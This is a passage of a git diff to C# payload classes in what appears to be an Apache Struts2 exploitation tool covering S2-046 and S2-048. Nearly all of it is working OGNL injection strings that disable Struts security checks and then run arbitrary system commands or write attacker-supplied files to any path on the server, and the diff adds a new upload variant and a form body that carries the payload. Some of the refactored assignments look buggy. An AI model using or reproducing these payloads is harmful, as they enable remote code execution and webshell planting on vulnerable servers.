//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#req.getHeader('test'),'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//大文件
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream([path])).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.File('[path]').mkdirs()).(#fs=new java.io.FileOutputStream('[pathfilename]')).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}";
public String Get_Exp_Check()
{
@@ -38,13 +39,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
diff --git a/Test/payload/S2046.cs b/Test/payload/S2046.cs
index c2fa634..38dcdae 100644
--- a/Test/payload/S2046.cs
+++ b/Test/payload/S2046.cs
@@ -13,7 +13,9 @@ public class S2046:BasePayload
private String Exp_Exec = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\0b";
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.BufferedWriter(new java.io.FileWriter(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
+
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='[content]').(new java.io.File('[path]').mkdirs()).(new java.io.BufferedWriter(new java.io.FileWriter('[pathfilename]')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b";
public String Get_Exp_Check()
{
@@ -34,13 +36,16 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
- else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ else
+ {
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path + "/" + fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
diff --git a/Test/payload/S2048.cs b/Test/payload/S2048.cs
index 8489874..01fc485 100644
--- a/Test/payload/S2048.cs
+++ b/Test/payload/S2048.cs
@@ -19,7 +19,9 @@ public class S2048:BasePayload
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(new java.net.URLDecoder().decode(#req.getHeader('test'),'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
//大文件
- private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream([path])).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
+ private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(#req.getSession().getServletContext().getRealPath('/[pathfilename]'))).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
+
+ private String Exp_SetMyUpload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(new java.io.File('[path]').mkdirs()).(#fs=new java.io.FileOutputStream('[pathfilename]')).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}";
public String Get_Exp_Check()
{
@@ -41,16 +43,18 @@ public String Get_Exp_Exec(String cmd)
}
public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
+ String data = "";
if ("".Equals(path))
{
- path = "#req.getSession().getServletContext().getRealPath('/"+fileName+"')";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ data= this.Exp_Upload.Replace("[filecontent]", fileContent);
}
- else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "'"+path+ "'");
+ else
+ {
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_Upload.Replace("[pathfilename]", path + "/" + fileName);
+ data=this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- String data =this.Exp_Upload.Replace("[filecontent]", fileContent);
-
return String.Format("name={0}&age=a&__checkbox_bustedBefore=true&description=s", System.Web.HttpUtility.UrlEncode(data));
}
}